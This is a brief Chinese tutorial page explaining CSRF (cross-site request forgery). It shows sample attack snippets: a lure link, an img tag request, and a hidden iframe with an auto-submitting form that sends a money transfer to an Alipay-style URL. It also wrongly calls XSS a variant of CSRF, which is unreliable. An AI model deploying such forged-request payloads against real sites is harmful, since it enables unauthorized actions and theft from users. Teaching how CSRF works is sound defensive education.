正文  软件开发 > html5 >

html5知识点:CSRF攻击,html5知识点csrf

html5知识点:CSRF攻击,html5知识点csrfCSRF全称叫做,跨站请求伪造。 就是黑客可以伪造用户的身份去做一些操作,进而满足自身目的。 这是请求伪造的基本原理。那么支付宝...

html5知识点:CSRF攻击,html5知识点csrf

CSRF全称叫做,跨站请求伪造。

就是黑客可以伪造用户的身份去做一些操作,进而满足自身目的。

这是请求伪造的基本原理。那么支付宝验证用户身份的机制是什么呢?

伪造请求的方式一般有如下几种方式:

页面中有一个超链接,诱导用户进行点击

<a href=”https://alipay.com?userid=3&money=9999”>iphone8提前曝光</a>

直接在页面上使用Img进行get请求

<img src=”https://alipay.com?userid=3&money=9999”/>

或使用表单进行提交

<iframe name="heihei" style="display:none;"></iframe>

<formaction="https://alipay.com?userid=3&money=9999"method="post"target="heihei" >

<inputname="userid"value="3" type="hidden" />

<inputname="money"value="9999" type="hidden" />

</form>

<script>

window.onload = function(){

document.forms[0].submit();

}

</script>

除此之外,CSRF还有一个变种攻击,叫做XSS

使用了脚本注入的原理,来进行更彻底的身份伪造。